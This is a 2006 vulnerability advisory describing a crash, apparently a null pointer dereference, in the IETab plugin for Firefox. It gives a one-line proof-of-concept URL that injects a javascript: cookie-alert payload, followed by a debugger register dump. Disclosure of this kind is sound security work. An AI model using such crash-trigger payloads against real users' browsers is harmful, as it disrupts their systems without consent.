Firefox (with IETab Plugin) Null Pointer Dereferences Bug ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Vendor: Mozilla Product: FireFox with IE Tab Tested On: FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K) Introduction: IETab (https://addons.mozilla.org/firefox/1419/) is a recently released (April 12, 2006) plugin for Firefox. It is used to browse IE (only) specific sites under Firefox. Guess what ?? You can run windowsupdate under FireFox ;-) Bug Details: Firefox with the IETab installed crashes when ietab plugin is unable to handle specific javascripts. It seems to be a null pointer dereference bug. For more details refer the PoC section. Proof-of-Concept: Copy & paste the following URL to the Firefox addressbar and press enter - chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie); Note: This test will not work if IETab is not installed. The Registers details after the crash: (1e4.3e0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000 eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246 npietab!NP_GetEntryPoints+0xb8ac: 0192e7dc 668b10 mov dx,[eax] ds:0023:00000000=???? 0:000> g (1e4.3e0): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b edi=00000000 eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 npietab!NP_GetEntryPoints+0xb8ac: 0192e7dc 668b10 mov dx,[eax] ds:0023:00000000=???? For more vulnerabilities : http://hackingspirits.com/vuln-rnd/vuln-rnd.html Credits: Debasis Mohanty (aka Tr0y) www.hackingspirits.com